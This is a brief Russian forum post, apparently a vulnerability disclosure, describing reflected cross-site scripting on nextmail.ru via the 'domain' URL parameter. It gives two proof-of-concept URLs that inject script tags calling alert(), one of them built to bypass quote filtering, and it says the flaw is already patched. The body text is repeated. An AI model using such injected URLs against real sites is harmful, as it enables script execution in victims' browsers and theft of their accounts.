Cross Site Scripting на NextMail.ru
Уязвимость позволяет удаленному пользователю выполнить произвольный JS код на компьютере жертвы. ПРимер:
А вот еще с фильтрацией кавычек:
На момент написания статьи уязвимость была УЖЕ пропатчена. Инфа вывалена для ознакомления.
Уязвимость позволяет удаленному пользователю выполнить произвольный JS код на компьютере жертвы. ПРимер:
Код:
http://www.nextmail.ru/?m=accountmissing&domain=[script]alert('xss.pro/')[/script]А вот еще с фильтрацией кавычек:
Код:
http://www.nextmail.ru/?m=accountmissing&domain=[script]alert(/xss.pro/)[/script]На момент написания статьи уязвимость была УЖЕ пропатчена. Инфа вывалена для ознакомления.